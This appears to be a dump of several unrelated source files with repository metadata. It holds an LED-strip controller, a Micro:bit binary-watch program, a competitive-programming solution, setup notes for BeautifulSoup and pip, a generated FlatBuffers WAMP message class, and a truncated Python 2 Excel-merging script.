            buf += bytes((g, r, b, 0))
        await self.pixel(buf)
# The four physical controllers on the LAN.
CONTROLLERS = [
    Controller('192.168.1.165', 6454),
    Controller('192.168.1.201', 6454),
    Controller('192.168.1.192', 6454),
    Controller('192.168.1.203', 6454),
]

# One Beam per LED strip: five 180-pixel strips, four 233-pixel strips.
BEAMS = [
    Beam(CONTROLLERS[0], 0, 180),
    Beam(CONTROLLERS[0], 1, 180),
    Beam(CONTROLLERS[0], 2, 180),
    Beam(CONTROLLERS[1], 0, 180),
    Beam(CONTROLLERS[1], 1, 180),
    Beam(CONTROLLERS[2], 0, 233),
    Beam(CONTROLLERS[2], 1, 233),
    Beam(CONTROLLERS[3], 0, 233),
    Beam(CONTROLLERS[3], 1, 233),
]
class Frame:
    """Off-screen frame buffer: ``h`` rows (one per beam) of ``w`` GRBW pixels."""

    def __init__(self, w, h):
        self._buf = bytearray(w * h * 4)  # 4 bytes per pixel: G, R, B, W
        self._mv = memoryview(self._buf)
        self._w = w
        self._h = h

    def _offset(self, x, y):
        # Byte offset of pixel (x, y) in the flat buffer.
        return (y * self._w + x) * 4

    def clear(self):
        """Black out every pixel."""
        self._buf[:] = bytes(len(self._buf))

    def fill(self, r, g, b, w=0):
        """Set every pixel in the frame to one color."""
        self._buf[:] = bytes((g, r, b, w)) * (self._w * self._h)

    def rect(self, x, y, w, h, r, g, b, ww=0):
        """Fill the axis-aligned w*h rectangle whose top-left is (x, y)."""
        row = bytes((g, r, b, ww)) * w
        for yy in range(y, y + h):
            start = self._offset(x, yy)
            self._buf[start:start + 4 * w] = row

    async def write(self):
        """Push each row to its beam, then flush every controller."""
        for idx, beam in enumerate(BEAMS):
            start = idx * self._w * 4
            await beam.pixel(self._mv[start:start + beam._n * 4])
        for ctrl in CONTROLLERS:
            await ctrl.flush()

    def pixel(self, x, y, r, g, b, w=0):
        """Set a single pixel's color."""
        p = self._offset(x, y)
        self._buf[p:p + 4] = bytes((g, r, b, w))
async def flush():
    # Wait until every controller has drained its send queue.
    for c in CONTROLLERS:
        await c.flush()

async def color(r,g,b,w=0):
    # Set every strip on every controller to one color, then flush.
    for c in CONTROLLERS:
        await c.color(r,g,b,w)
    await flush()

async def flash(r,g,b,w=0):
    # Show a color momentarily, then blank the roof.
    await color(r,g,b,w)
    await color(0,0,0,0)
async def main():
    """CLI entry point: ``color r g b [w]`` or ``rainbow`` (runs forever)."""
    if len(sys.argv) < 2:
        return
    if sys.argv[1] == 'color':
        await color(*(int(x) for x in sys.argv[2:]))
    elif sys.argv[1] == 'rainbow':
        f = Frame(233, 9)
        i = 0
        while True:
            # Slowly drifting spatial frequencies give a plasma-like pattern.
            fx = 1+(1*math.cos(i/91)*math.cos(i/79))
            fy = 1+(1*math.sin(i/83)*math.sin(i/101))
            tt = i / 10  # NOTE(review): currently unused
            for y in range(9):
                for x in range(233):
                    xx = x / 233
                    yy = y / 9
                    # Map the 2-D sine/cosine field onto a rainbow palette index.
                    p1 = int(1200 * (math.sin(fy*math.pi*yy)+math.cos(fx*math.pi*xx) + 1))
                    r,g,b = rainbow.rainbow(p1+i)
                    f.pixel(x, y, r,g,b,0)
            await f.write()
            i += 0.1

if __name__ == '__main__':
    asyncio.run(main())
| [
"jim.mussared@gmail.com"
] | jim.mussared@gmail.com |
4a54043047808d15f7bbd51f8331c719f8bd6527 | c7f732e6d7fff86bb99cf85c0814c1a76c5f16c4 | /main.py | fd862c3423503bd3843404a2172356643276eb00 | [] | no_license | Starmancer/watch | 57653644ea69f2f6d84ce4fecb5cd86ea380391b | 81c18726641ff06848fc73f6369d44aba2bd45ea | refs/heads/master | 2023-02-14T17:44:40.980712 | 2021-01-10T21:26:08 | 2021-01-10T21:26:08 | 328,482,636 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,674 | py | #About
#'Bit:watch' is a Binary Watch programme written in MicroPython for the BBC Micro:bit by @petejbell and distributed under a MIT licence
#Please share with me what you do with it, I'd love to see what you do!
#You can find a tutorial showing you how to build a strap for your watch here: https://t.co/li9CktVJhg
#Instructions
#1) Download Mu from here: https://github.com/ntoll/mu
#2) Copy and paste this BitWatch code to Mu, connect your Micro:bit to your computer and then flash the code to your Micro:bit
#3) The BitWatch will display 18:50 as the time for 10 seconds and will then show '18:51'.
# Use Button A to set the Hours and B to set the Minutes. Press each one and you will see the hours/minutes increment on the Micro:bit and the Repl console.
# Use Buttons A+B together to reset seconds to '0'.
#
# Column 0 shows the first digit in the hours (in 24hr clock)
# Column 1 shows the second digit.
# Column 2 shows the seconds flashing away.
# Column 3 shows the first digit in the minutes
# Column 4 shows the second digit.
#For a crash course on binary, see here: http://www.bbc.co.uk/education/guides/z26rcdm/revision/2
#Sets up microbit
from microbit import *
# Sets time variables (24-hour clock state shared via `global` below)
hrs = 18
mins = 50
sec = 50
hours = []    # reassigned to per-digit list / string form of hrs later
minutes = []  # reassigned to per-digit list / string form of mins later
seconds = []  # reassigned to the string form of sec each tick
# Sets brightness of time digits
b = 9
# defines functions to display time digits
# Each function clears column ``x`` and lights the pixels that encode its
# digit in binary (row 3 = bit 0 ... row 0 = bit 3) at brightness ``b``.
# (The stray trailing commas turn some calls into tuple expressions; harmless.)
def one(x):
    zero(x)
    display.set_pixel(x, 3, b),

def two(x):
    zero(x)
    display.set_pixel(x, 2, b),

def three(x):
    zero(x)
    display.set_pixel(x, 3, b)
    display.set_pixel(x, 2, b),

def four(x):
    zero(x)
    display.set_pixel(x, 1, b),

def five(x):
    zero(x)
    display.set_pixel(x, 3, b)
    display.set_pixel(x, 1, b),

def six(x):
    zero(x)
    display.set_pixel(x, 2, b)
    display.set_pixel(x, 1, b),

def seven(x):
    zero(x)
    display.set_pixel(x, 1, b)
    display.set_pixel(x, 2, b)
    display.set_pixel(x, 3, b),

def eight(x):
    zero(x)
    display.set_pixel(x, 0, b),

def nine(x):
    zero(x)
    display.set_pixel(x, 0, b)
    display.set_pixel(x, 3, b),

def zero(x):
    # Turn off the four binary rows of column x.
    for i in range(0,4):
        display.set_pixel(x, i, 0)
# function to create ticking seconds: sets the two middle pixels of
# column 2 to brightness x (alternated by the main loop to "tick")
def fadesecs(x):
    display.set_pixel(2, 2, x)
    display.set_pixel(2, 1, x)

# functions to dimly light the binary display 'area' so "off" bits are visible
def background(x,y):
    if display.get_pixel(x, y) < 1: #checks if each pixel is turned off
        display.set_pixel(x, y, 1) #if so, sets the pixel to a value of 1

def backgrounds():
    for i in range(4): #misses the flashing seconds column (2) and the last row
        background(0, i)
        background(1, i)
        background(3, i)
        background(4, i)
# function to print the time to the REPL in Mu (for testing/debugging)
def printtime():
    print(str(hours)+":"+str(minutes)+":"+str(seconds))

# Digit-to-renderer lookup used by displaybinaries(): index d-1 selects the
# function for digit d; digit 0 wraps to index -1, which is zero().
binaries = [one, two, three, four, five, six, seven, eight, nine, zero]
# function to show the time in binary using the digit renderers above:
# columns 0-1 are the hour digits, columns 3-4 the minute digits.
def displaybinaries():
    global mins #each variable must be defined as 'global' (otherwise the function thinks they are defined 'locally', within itself)
    global hrs
    global minutes
    global hours
    if mins<10:
        # Single-digit minutes: clear the tens column, draw the units.
        binaries[mins-1](4) #sets column 4 to digit from minutes (if mins between 0 and 9)
        zero(3) #clears column 3
        backgrounds() #calls the backgrounds to (dimly) light 'off' pixels
    elif mins > 9:
        minutes = [int(i) for i in str(mins)] #creates a list of two digits from the string of mins
        binaries[minutes[0]-1](3) #calls the binaries function to display the first digit
        binaries[minutes[1]-1](4) #calls the binaries function to display the second digit
        backgrounds()
    if hrs<10:
        binaries[hrs-1](1)
        zero(0)
        backgrounds()
    elif hrs > 9:
        hours = [int(i) for i in str(hrs)]
        binaries[hours[0]-1](0)
        binaries[hours[1]-1](1)
        backgrounds()
# function to check if buttons pressed and adjust the time accordingly
def sleepbutton(x):
    """Poll the buttons once, then sleep for ``x`` milliseconds.

    Button A advances the hour; button B advances the minute and resets
    the seconds.  Modulo arithmetic keeps hrs in 0-23 and mins in 0-59:
    the original ``< 24`` / ``< 60`` checks let the counters transiently
    reach 24 and 60, which the display then rendered as "24" / "60".
    """
    global sec
    global hrs
    global mins
    if button_a.was_pressed():
        hrs = (hrs + 1) % 24
        displaybinaries()
        print(hrs)
    if button_b.was_pressed():
        mins = (mins + 1) % 60
        sec = 0
        displaybinaries()
        print(mins)
    # NOTE(review): an A+B "reset seconds" handler used to live here but
    # never worked (was_pressed() above consumes the press events before a
    # combined is_pressed() check can see both buttons down), so it stays
    # disabled.
    sleep(x)
# Main loop: each pass is roughly one second -- poll buttons while the
# seconds pixels blink, then advance the clock.
while True:
    for i in range(0,5): #iterates 5 times (x 100 = 500)... but....
        sleepbutton(99) #The code runs a little slow/fast. Play with this number to get it accurate!
    fadesecs(1) #calls function to 'flash' seconds (dim half of the cycle)
    for i in range(0,5): #iterates 5 times again
        sleepbutton(98) #see above
    fadesecs(4) #calls function to 'flash' seconds (bright half of the cycle)
    sec += 1
    if sec % 60 == 0: #this section increments time (sec itself is never reset)
        mins += 1
        if mins % 60 == 0:
            hrs += 1
            mins = 0
            if hrs % 24 == 0:
                hrs = 0
    seconds=str(sec)
    minutes=str(mins)
    hours=str(hrs)
    printtime()
    displaybinaries()
"ewarfare@me.com"
] | ewarfare@me.com |
6fdea119f9c9239b63eda3db6b7c2b1d0233e66d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02585/s776126936.py | 78cc9d2cac5fd2a3bfb611ed540139e54d721039 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,175 | py | import sys
sys.setrecursionlimit(10**7)
readline = sys.stdin.buffer.readline
def readstr():return readline().rstrip().decode()
def readstrs():return list(readline().decode().split())
def readint():return int(readline())
def readints():return list(map(int,readline().split()))
def printrows(x):print('\n'.join(map(str,x)))
def printline(x):print(' '.join(map(str,x)))
def check(cir, num):
    """Best score obtainable with at most ``num`` moves on cycle ``cir``.

    Searches for a maximum-sum window over the prefix sums, alternately
    extending the right end and re-picking the best left end; the second
    loop handles windows that wrap around the cycle (complement of a
    minimum-sum interior window).
    NOTE(review): intent reconstructed from the algorithm's shape -- verify.
    """
    m = len(cir)
    a = sum(cir)
    if num == 0:
        ss = 0
    elif num == 1:
        ss = max(cir)
    else:
        ac = list(accumulate([0]+cir))  # prefix sums: ac[i] == sum(cir[:i])
        l = 0
        r = 1
        ss = ac[r]-ac[l]
        i = 0
        while 1:
            if r == m:
                # Right end pinned at the cycle end: best left end and stop.
                l = ac[l+1:r].index(min(ac[l+1:r])) + l+1
                ss = max(ss,ac[r]-ac[l])
                break
            elif i%2==0:
                # Extend r to the max prefix within `num` moves of l.
                r = ac[r+1:l+num+1].index(max(ac[r+1:l+num+1])) + r+1
            else:
                # Shrink from the left to the minimum prefix before r.
                l = ac[l+1:r].index(min(ac[l+1:r])) + l+1
            i+=1
            ss = max(ss,ac[r]-ac[l])
        # Wrap-around case: take the whole cycle minus the worst interior
        # window of length m-num.
        num = m-num
        l = 0
        r = num
        i = 0
        ss = max(ss,a-ac[r]+ac[l])
        while 1:
            if r == m:
                l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1
                ss = max(ss,a-ac[r]+ac[l])
                break
            elif i%2==0:
                r = ac[r+1:l+m].index(min(ac[r+1:l+m])) + r+1
            else:
                l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1
            i+=1
            ss = max(ss,a-ac[r]+ac[l])
    return ss
from itertools import accumulate

n,k = readints()
p = [x-1 for x in readints()]  # permutation, converted to 0-based
c = readints()                 # score of each square

# Decompose the permutation into its cycles; each entry of `circles` holds
# the scores along one cycle in traversal order.
circles = []
used = [0]*n
for i in range(n):
    if not used[i]:
        circles.append([c[i]])
        used[i] = 1
        j = p[i]
        while not used[j]:
            circles[-1].append(c[j])
            used[j] = 1
            j = p[j]

score = -10**20  # effectively -infinity
for cir in circles:
    m = len(cir)
    a = sum(cir)
    if k>m:
        if a>0:
            # Positive full laps pay off: take as many as fit plus the best
            # partial lap, or one fewer lap plus a full-cycle window.
            score = max(score, (k//m)*a + check(cir,k%m), (k//m-1)*a + check(cir,m))
        else:
            score = max(score,check(cir,m))
    else:
        score = max(score,check(cir,k))
print(score)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
0a66b8c303841840febd5901cb4c69c8ed029eba | 1b4cbdbb58e4b6ade98d9b407a578d406f22e693 | /demotest/__init__.py | b15b340091d0b4f3724839dea770b349ba87a85a | [] | no_license | kevin-di-10/QT4CDemoProj | f6b9568c886702a214e99ede32c71acb93c3e1e5 | 242188e066bd2bd23eff4c6b24b0b689d85d01a7 | refs/heads/master | 2022-04-09T01:37:01.064814 | 2020-02-20T08:29:42 | 2020-02-20T08:29:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | # -*- coding: utf-8 -*-
'''测试用例
'''
#2018/12/17 QTAF自动生成
| [
"774517491@qq.com"
] | 774517491@qq.com |
f8f954cdca6e653c7cc7345e2ba1983dae0767be | e7aa8615cd2a09d64a7fdc93bf10fc74b5a0f726 | /note/spider_nba_note.py | 6ca2ced88a8c5fc3c2af33c87ba48db1211829c4 | [] | no_license | zonyeeLu/zonyee_dwh | 18c908ed7dab4039acfb48e93df74a449eb680b0 | dc7a8fe92a5d300550a6a69a5f4249a73f51c493 | refs/heads/master | 2022-02-08T13:33:33.048986 | 2022-01-08T15:04:54 | 2022-01-08T15:04:54 | 196,799,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,252 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ******************************************************************************
# 程序名称: spider_nba_note.py
# 功能描述: 将数据写入hdfs 笔记
# 输入参数: 无
# 创建人名: zonyee_lu
# 创建日期: 20190715
# ******************************************************************************
# ******************************************************************************
# 在服务器中安装BeautifulSoup步骤
# 下载地址:http://www.crummy.com/software/BeautifulSoup/download/4.x/
# 推荐下载BeautifulSoup-4.2.1.tar.gz
# 解压缩:tar xvzf BeautifulSoup-4.2.1.tar.gz
# 进入beautifulsoup4-4.2.1文件
# 命令:python setup.py install
# 测试是否安装成功
# 输入python,
# >>from bs4 import BeautifulSoup
# 没有报告错误,安装成功
# python3 安装 BeautifulSoup
# https://jingyan.baidu.com/article/ac6a9a5e31c87c2b643eac11.html
# 安装bs4遇到的问题:
# You are trying to run the Python 2 version of Beautiful Soup under Python 3
# 解决方案:
# 解决办法:直接将压缩文件中的bs4复制到python安装目录下的lib中,然后再利用python自带工具2to3.py将版本2下的.py 文件转化为版本3下的文件
# 具体:将bs4文件夹和2to3.py同时放到lib中,然后在cmd中定位到lib,运行:2to3 -w bs4就好了,最后需要将lib/bs4 覆盖/usr/local/Python3/lib/python3.6/site-packages之前的bs4
# 2to3 位置: /usr/local/Python3/bin
# 服务器中安装pip步骤
# https://pypi.python.org/pypi/pip
# 下载之后的包上传到服务器上
# 然后解压 tar -zxvf ***
# 解压之后会有个文件夹
# 进入到文件夹,执行命令python setup.py install
# 安装完之后执行 pip -V 如果能看到版本号,代表安装成功
# 如果报错-bash: pip: command not found
# 那么可以看一下是不是没有把python加入到环境变量中,如果没有添加一下,修改/etc/profile文件
# export PATH="$PATH:/usr/local/python/bin" python 的路径一定要正确
# source /etc/profile
# 然后重新打开一个会话,执行pip -V 就可以看到了
# ok,安装成功了
# 安装pyhive 包
# pip install sasl
# pip install thrift
# pip install thrift-sasl
# pip install PyHive | [
"xianbing"
] | xianbing |
6d56c14dcbba73bbc80284c74d32c7efe6a0d6e2 | 04f599eec632155a2c7d0679967a8b82ce5f0faa | /Chapter5Ex.py | 7c9f4f4f06933b7670091e237d1988a47a84003c | [] | no_license | ssharp96/Comp-Sci-350 | 7f4f6f77e3087883593cc269da8698e94b57f30d | 5615412280d315fad06aa5e67532458dc0df6f54 | refs/heads/master | 2016-09-06T15:48:51.757522 | 2014-03-19T22:15:33 | 2014-03-19T22:15:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | # Chapter 5 Exercises
# author: SSharp
#Problem 1
x = int(input("Pick a number between 0 and 6, inclusive: "))
if (x == 0):
print("The day with value",x,"is Sunday.")
elif (x == 1):
print("The day with value",x,"is Monday.")
elif (x == 2):
print("The day with value",x,"is Tuesday.")
elif (x == 3):
print("The day with value",x,"is Wednesday.")
elif (x == 4):
print("The day with value",x,"is Thrusday.")
elif (x == 5):
print("The day with value",x,"is Friday.")
else:
print("The day with value",x,"is Saturday.")
| [
"simonsharp96@gmail.com"
] | simonsharp96@gmail.com |
6d08dfaad6bb9fec95d57b70fa180577ae63423c | 5783336b9b40b0999b2a39104d0135b2b85f3c17 | /Scripts/PlantSEED_v3/Curation/krbeilsmith/update_publications.py | 7ca49afbcdfb402800ae87480bc3d201de44dbc9 | [] | no_license | ModelSEED/PlantSEED | 3fb0d82c15c108dd885047409d9a09207896fa5c | 8cf60046e4af68912f7a7d3eeff16880a07f56bd | refs/heads/master | 2022-08-30T23:49:02.140280 | 2021-08-30T16:09:39 | 2021-08-30T16:09:39 | 38,062,831 | 5 | 9 | null | 2022-04-01T19:53:20 | 2015-06-25T17:11:58 | Perl | UTF-8 | Python | false | false | 1,200 | py | #!/usr/bin/env python
import os,sys,json
if(len(sys.argv)<2 or os.path.isfile(sys.argv[1]) is False):
    print("Takes one argument, the path to and including roles file")
    sys.exit()

# Parse the updates file: one tab-separated record per line, each field a
# "key:value" pair (the value itself may contain colons, hence maxsplit=1).
updates_list=list()
with open(sys.argv[1]) as updates_file:
    for line in updates_file.readlines():
        line=line.strip('\r\n')
        array = line.split('\t')
        updates_dict=dict()
        for entry in array:
            (key,value) = entry.split(':', maxsplit=1)
            updates_dict[key]=value
        updates_list.append(updates_dict)

# Merge each update's '|'-separated publications into the role entry whose
# feature list contains the update's feature id (skipping duplicates).
with open("../../../../Data/PlantSEED_v3/PlantSEED_Roles.json") as subsystem_file:
    roles_list = json.load(subsystem_file)
    for update in updates_list:
        for entry in roles_list:
            if(update['feature'] in entry['features']):
                print("Updating: ",update['feature'])
                for publication in update['publications'].split('|'):
                    if(publication not in entry['publications']):
                        entry['publications'].append(publication)

# Rewrite the roles JSON in place with the merged publication lists.
with open('../../../../Data/PlantSEED_v3/PlantSEED_Roles.json','w') as new_subsystem_file:
    json.dump(roles_list,new_subsystem_file,indent=4)
"samseaver@gmail.com"
] | samseaver@gmail.com |
a61845d3d55e2143d1405a204b2915ac38643a23 | 4ddc37c1db4112478c96f86768cfd9c7616c8105 | /app/error/views.py | 8b9e6ec49ceec154b1bb2b14c4f27d4abf99d305 | [] | no_license | NeoWzk/flaskblog | 63506c8e44c0e27977d86e2e2b4c9513219bacf1 | 1fb19dded74f4715171a9339666b36add6efedcd | refs/heads/master | 2020-04-23T07:25:39.595366 | 2019-02-26T03:05:43 | 2019-02-26T03:05:43 | 170,990,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | from flask import render_template, url_for, redirect, flash
from . import error
@error.app_errorhandler(404)
def page_not_found(e):
    """Serve the custom "page not found" template."""
    template_name = 'errors/404.html'
    return render_template(template_name)
@error.app_errorhandler(500)
def internal_server_error(e):
    """Serve the custom "internal server error" template."""
    template_name = 'errors/500.html'
    return render_template(template_name)
@error.app_errorhandler(401)
def unauthorized(e):
    """Serve the custom "unauthorized" template."""
    template_name = 'errors/unauthorized.html'
    return render_template(template_name)
"2585414795@qq.com"
] | 2585414795@qq.com |
f41b5ad4bb00f7a7e6cfd9467186de6134f392fa | 6fd69948915b152d02fb057737b52946bc4135c7 | /model/RuleModel.py | c727a3f651d5b00ef228a6c8f5f40b9e683ebbce | [] | no_license | Kimxiaogen/TrustTest | 2c6b52bb0e5788287e57fa6a69e993f3d25a1674 | 771440bbf33a510df78f8c6250487f94910739da | refs/heads/master | 2023-01-09T08:19:16.328029 | 2020-11-04T07:41:01 | 2020-11-04T07:41:45 | 309,928,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,080 | py | from model.RoleModel import Role, Role_A, Role_B, Role_C, Role_D, Role_E
import random as rd
import copy
import writeToCSV
def getSort(role):
    """Key function: order roles by their ``sort`` (kind) field."""
    sort_value = role.sort
    return sort_value
def getCoins(role):
    """Key function: order roles by their ``coins`` (score) field."""
    coin_count = role.coins
    return coin_count
class Rule:  # Defines the rules of the iterated game tournament.
    def __init__(self, reward, players_num, epoch, max_turns, replace, mistake_rate, sign):
        self.reward = reward  # payoff table: 2x2 array whose entries are length-2 [coin_a, coin_b] pairs
        self.players_num = players_num  # mix of the 5 player kinds, length-5 array
        self.epoch = epoch  # rounds played per pairing in each game
        self.max_turns = max_turns  # maximum number of games (generations)
        self.replace = replace  # per game: drop `replace` lowest scorers, clone the top scorer
        self.mistake_rate = mistake_rate  # error rate, in the range 0 to 1
        self.roles = []  # participating role instances
        self.total_num = sum(players_num)  # total number of players
        self.data = []  # per-generation population counts, written to CSV at the end
        self.sign = sign  # run label used in the output file name

    def compute(self, choice_a, choice_b):  # Compute the payoff of one decision pair.
        reward_array = self.reward[choice_a][choice_b]  # the [coin_a, coin_b] payoff pair
        coin_a = reward_array[0]
        coin_b = reward_array[1]
        return coin_a, coin_b

    def play(self, a, b):  # Roles a and b play one round against each other.
        choose_a = self.mistake(a.choose())
        choose_b = self.mistake(b.choose())
        coin_a, coin_b = self.compute(choose_a, choose_b)
        # Each player learns the opponent's move and banks its own payoff.
        a.feedback(choose_b, coin_a)
        b.feedback(choose_a, coin_b)

    def playForNum(self, a, b, num):  # Roles a and b play `num` rounds.
        for i in range(num):
            self.play(a, b)

    def mistake(self, choice):  # Randomly flip the choice according to the error rate.
        rand = rd.random()
        if rand < self.mistake_rate:  # on an error, invert the choice
            choice = 1 if choice == 0 else 0
        return choice

    def show(self):  # Print (and record) the current population mix per role kind.
        print("角色A\t角色B\t角色C\t角色D\t角色E\n")
        arr = []
        for num in self.players_num:
            arr.append(num)
            print(str(num) + "\t\t", end='')
        print()
        self.data.append(arr)

    def updatePlayersNum(self):  # Recount how many players of each kind remain.
        self.players_num = [0, 0, 0, 0, 0]
        for r in self.roles:
            self.players_num[r.sort - 1] += 1

    def addPlayers(self):  # Construct the participating players.
        coins = 0  # starting coin count
        for n in range(self.players_num[0]):
            r = Role_A(coins)
            self.roles.append(r)
        for n in range(self.players_num[1]):
            r = Role_B(coins)
            self.roles.append(r)
        for n in range(self.players_num[2]):
            r = Role_C(coins)
            self.roles.append(r)
        for n in range(self.players_num[3]):
            r = Role_D(coins)
            self.roles.append(r)
        for n in range(self.players_num[4]):
            r = Role_E(coins)
            self.roles.append(r)

    def initPlayers(self):  # Reset every player for a new game.
        for r in self.roles:
            r.clean()
        self.roles.sort(key=getSort)  # order by role kind

    def replaceFailers(self):  # Replace the lowest scorers with copies of the top scorer.
        self.roles.sort(key=getCoins)  # ascending by coin count
        winner = self.roles[self.total_num - 1]  # richest player
        loser = self.roles[0].coins  # lowest score
        # Remove `replace` lowest-scoring players; when more than `replace`
        # players are tied at the bottom, pick victims at random.
        if loser == self.roles[self.replace - 1].coins:  # more than `replace` are tied
            remove_list = []
            for i in range(len(self.roles)):
                if loser == self.roles[i].coins:
                    remove_list.append(i)
            max = len(remove_list)  # NOTE(review): shadows the builtin max()
            for n in range(self.replace):
                # NOTE(review): randrange may repeat an index, so fewer than
                # `replace` distinct players can end up replaced -- confirm intended.
                rand = rd.randrange(0, max, 1)
                self.roles[remove_list[rand]] = copy.deepcopy(winner)
        else:  # `replace` or fewer are tied
            for r in range(self.replace):
                self.roles[r] = copy.deepcopy(winner)

    def start(self):  # Run the whole tournament.
        self.addPlayers()
        path = './result/mistake_rate_' + str(self.mistake_rate) + '_' + str(self.sign) + '.csv'
        for m in range(self.max_turns):  # each game is a round-robin among all players
            self.initPlayers()
            self.show()
            for gap in range(1, self.total_num):  # pair players at every index distance
                index = 0
                curr = self.total_num - gap
                while index + curr < self.total_num:
                    a = self.roles[index]
                    b = self.roles[index + curr]
                    self.playForNum(a, b, self.epoch)
                    index += 1
                    a.reset()
                    b.reset()
            self.replaceFailers()
            self.updatePlayersNum()
        writeToCSV.writecsvByName(self.data, path)
| [
"1147209611@qq.com"
] | 1147209611@qq.com |
5f6f17cb23c11eed1498eb099c9451bbd805d7e7 | 29486eba7c582dfeaef4a10da4c82b5ab6e778c0 | /autobahn/wamp/gen/wamp/proto/Unsubscribed.py | 3fafde8d6377be3c947c2118e39603478058e433 | [
"MIT"
] | permissive | oberstet/autobahn-python | 4947396741edfe7fc17ecae6a334418a0315bc2c | 359f868f9db410586cf01c071220994d8d7f165a | refs/heads/master | 2023-06-23T01:21:19.487304 | 2023-06-14T07:25:55 | 2023-06-14T07:25:55 | 128,950,670 | 0 | 0 | MIT | 2018-04-10T14:57:55 | 2018-04-10T14:57:55 | null | UTF-8 | Python | false | false | 2,690 | py | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: proto
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class Unsubscribed(object):
    """Generated FlatBuffers read accessor for a WAMP UNSUBSCRIBED table."""
    __slots__ = ['_tab']

    @classmethod
    def GetRootAs(cls, buf, offset=0):
        # Resolve the root table offset inside `buf` and wrap it.
        n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
        x = Unsubscribed()
        x.Init(buf, n + offset)
        return x

    @classmethod
    def GetRootAsUnsubscribed(cls, buf, offset=0):
        """This method is deprecated. Please switch to GetRootAs."""
        return cls.GetRootAs(buf, offset)

    # Unsubscribed
    def Init(self, buf, pos):
        self._tab = flatbuffers.table.Table(buf, pos)

    # Unsubscribed -- uint64 field at vtable slot 4; 0 when absent.
    def Session(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
        return 0

    # Unsubscribed -- uint64 field at vtable slot 6; 0 when absent.
    def Request(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
        return 0

    # Unsubscribed -- uint64 field at vtable slot 8; 0 when absent.
    def Subscription(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
        return 0

    # Unsubscribed -- optional string field at vtable slot 10; None when absent.
    def Reason(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
        if o != 0:
            return self._tab.String(o + self._tab.Pos)
        return None
# Generated builder helpers: call Start, then the Add* setters, then End.
# The short aliases (Start/AddSession/...) forward to the prefixed names.
def UnsubscribedStart(builder): builder.StartObject(4)
def Start(builder):
    return UnsubscribedStart(builder)
def UnsubscribedAddSession(builder, session): builder.PrependUint64Slot(0, session, 0)
def AddSession(builder, session):
    return UnsubscribedAddSession(builder, session)
def UnsubscribedAddRequest(builder, request): builder.PrependUint64Slot(1, request, 0)
def AddRequest(builder, request):
    return UnsubscribedAddRequest(builder, request)
def UnsubscribedAddSubscription(builder, subscription): builder.PrependUint64Slot(2, subscription, 0)
def AddSubscription(builder, subscription):
    return UnsubscribedAddSubscription(builder, subscription)
def UnsubscribedAddReason(builder, reason): builder.PrependUOffsetTRelativeSlot(3, flatbuffers.number_types.UOffsetTFlags.py_type(reason), 0)
def AddReason(builder, reason):
    return UnsubscribedAddReason(builder, reason)
def UnsubscribedEnd(builder): return builder.EndObject()
def End(builder):
    return UnsubscribedEnd(builder)
"noreply@github.com"
] | oberstet.noreply@github.com |
0ab4c7e45a076fdca44460ebcd19c329f4908220 | 635859dae21148fd6d9a4f0a1e601a3807c733a7 | /lirun.py | 9b2bd5b2041613a75a964a3a940281bb1295962d | [] | no_license | butter007/py | 14588849550b640b9496301e6da104116e36f1f5 | 2402b357eac5ec50a64db5e2d9ed37795ef71aea | refs/heads/master | 2021-06-30T19:31:21.167332 | 2020-08-26T13:15:18 | 2020-08-26T13:15:18 | 122,844,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,608 | py | # -*- coding: utf-8 -*-
from pyExcelerator import *
import datetime
import sys
import xlrd
import pickle
from xlutils.copy import copy
reload(sys)
sys.setdefaultencoding('utf-8')
eledata600211 = xlrd.open_workbook("D:\py\\600211.xlsx")
eletable600211 = eledata600211.sheets()[0]
nrows600211 = eletable600211.nrows
eledata660111 = xlrd.open_workbook("D:\py\\660111.xlsx")
eletable660111 = eledata660111.sheets()[0]
nrows660111 = eletable660111.nrows
eledata660311 = xlrd.open_workbook("D:\py\\660311.xlsx")
eletable660311 = eledata660311.sheets()[0]
nrows660311 = eletable660311.nrows
data6002 = xlrd.open_workbook("D:\py\\6002all.xlsx")
table6002 = data6002.sheets()[0]
nrows6002 = table6002.nrows
excel6002 = copy(data6002)
sheet6002 = excel6002.get_sheet(0)
row6002 = nrows6002
for i in xrange(1, nrows600211):
for j, data in enumerate(eletable600211.row_values(i)):
sheet6002.write(row6002 + i - 1, j, data)
excel6002.save('new6002all.xls')
data6601 = xlrd.open_workbook("D:\py\\6601all.xlsx")
table6601 = data6601.sheets()[0]
nrows6601 = table6601.nrows
excel6601 = copy(data6601)
sheet6601 = excel6601.get_sheet(0)
row6601 = nrows6601
for i in xrange(1, nrows660111):
for j, data in enumerate(eletable660111.row_values(i)):
